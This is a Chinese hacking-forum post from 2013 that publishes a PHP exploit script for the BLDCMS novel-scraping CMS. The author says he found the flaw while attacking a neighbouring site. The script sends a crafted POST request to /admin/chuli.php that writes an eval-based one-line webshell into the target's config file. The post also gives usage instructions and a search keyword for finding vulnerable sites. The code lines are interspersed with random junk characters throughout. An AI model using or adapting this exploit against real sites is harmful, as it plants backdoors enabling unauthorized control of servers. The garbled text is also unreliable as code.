之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
* o8 d- Q& h* Q1 [7 X+ b: w! ~0 L: I5 f d
4 \6 @* u5 S0 X5 S. V' s0 d话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 2 H# u6 [) b9 k z* M' I
; J5 o3 |, U0 E7 a k. Z% f既然都有人发了 我就把我之前写好的EXP放出来吧! G2 }1 l6 @( r* X6 A
; N! }! O7 a0 X: m! pview source print?01.php;">
@' [* n% y7 V( c, l02.<!--?php. ]8 V% O2 Q1 w# X
03.echo "-------------------------------------------------------------------
1 k$ { l8 E! j6 V" g04. 9 q* T+ ^7 q6 L' E! o9 u: ^: s4 K
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP2 u0 x, r6 h: q
06.
' F' Y' }5 F0 l' f* o6 T07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
( N5 a3 J. T! N y% ?- v+ W08.
$ L" H( j$ C; w4 T' m" o" B; }( ^09.QQ:981009941\r\n 2013.3.21\r\n
5 K4 }: I, h' o10.
* \& v9 R, r& a, Z$ I- i! x11. ! F& g; F# z% b
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码- y* @* v/ q4 A- L
13. 8 O# O$ E; N$ @- |( ?8 B
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------" ^, Q% Q. B2 G. \/ Y" u) A
15.
# j6 t* S; V/ v( E6 n. U5 b16.--------------------------------------------------------------------\r\n";
4 y5 k' i; Z2 C1 e17.$url=$argv[1];/ ]; M5 C$ q9 E8 B9 @
18.$dir=$argv[2];0 g6 Z& r$ Y/ e- w3 M, j/ N
19.$pass=$argv[3];# a1 V4 {- _4 d3 K! ~; |
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
7 G" l$ ^1 ], k" G21.if (emptyempty($pass)||emptyempty($url))
/ V1 R- o; Y. U* o2 }* {4 N22.{exit("请输入参数");}
9 U8 g* ]6 o2 a23.else0 Q7 t1 O# z+ N% S1 L! {# N- A
24.{+ B( r: T2 W" T6 f/ q
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
( z) C* E, N. w8 P26. . b* e0 d/ c' ~0 a4 G( C
27.al;2 x& u+ q( @! U- C9 L% {3 T7 p
28.$length = strlen($fuckdata);
# e1 }# i$ Q* Y29.function getshell($url,$pass)1 e& o" @, E0 x5 O6 k3 M% J# w% t. h6 N
30.{
5 E$ y$ A, ?: L8 U: D3 M31.global $url,$dir,$pass,$eval,$length,$fuckdata;
3 q, I M$ [: n4 q32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";! f- [ t- U% x
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
7 N3 _' W$ ]# {$ j3 T* d( e. u34.$header .= "User-Agent: MSIE\r\n";8 r; Z1 b4 f" ?1 {, z: _
35.$header .= "Host:".$url."\r\n";0 Q, f: b0 H6 E: l+ `2 P5 w
36.$header .= "Content-Length: ".$length."\r\n";
7 a( z- R- i- r- j7 A37.$header .= "Connection: Close\r\n";
/ u- J! j1 h3 V38.$header .="\r\n";) \% U/ s& ~* A, t
39.$header .= $fuckdata."\r\n\r\n";- n4 b% Q: j4 r1 H4 }
40.$fp = fsockopen($url, 80,$errno,$errstr,15); U" x' A* S8 [: T+ P! w
41.if (!$fp)6 ^ p/ x4 Z/ B* x- d" d
42.{
) z& d8 z8 L7 i; O: E8 V43.exit ("利用失败:请检查指定目标是否能正常打开");9 o. B+ g- b. J4 P5 b0 T
44.} l& a/ M6 W# v+ M8 Q: I
45.else{ if (!fputs($fp,$header))- u* f3 b8 U0 P( x: P# y. ?, k4 i7 Y
46.{exit ("利用失败");}
9 Z/ H/ W& r6 c% h# g47.else+ w* t7 v- L F8 x/ V
48.{
) A$ }, A9 S" e4 u8 ^49.$receive = '';* @1 w0 p$ \. s6 v, W
50.while (!feof($fp)) {) {+ G- q5 U- L" y; ]
51.$receive .= @fgets($fp, 1000);
) @$ b7 l8 B" u9 s3 A6 H2 G% ^52.}' D0 _) F& V0 w5 r* }; W0 h
53.@fclose($fp);
5 `; o" V, R5 H M7 j# b" o54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
$ B6 Z% J2 J2 X55.
3 R2 u8 O& g3 q s h: P56.GPC是否=off)";
8 a3 B) j% s8 p6 J. [1 n57.}}
& H" c; D( i W% L58.}
0 w! e* A& B: f( b# ?( `& b59.}
) F I* c G$ b* j% B" F+ p, D60.getshell($url,$pass);8 Z; y4 P% U4 { Q: ]$ z
61.?-->
P+ Y) S% F( Y% Q$ [: Z( l0 h
, r! |2 G8 C4 L7 j2 B) m- u( [- ]# [
; Y! [ W7 {$ s8 w
by 数据流
7 h1 P5 o9 y5 s9 J |
发表于 2013-3-26 20:49:10
收藏
支持
反对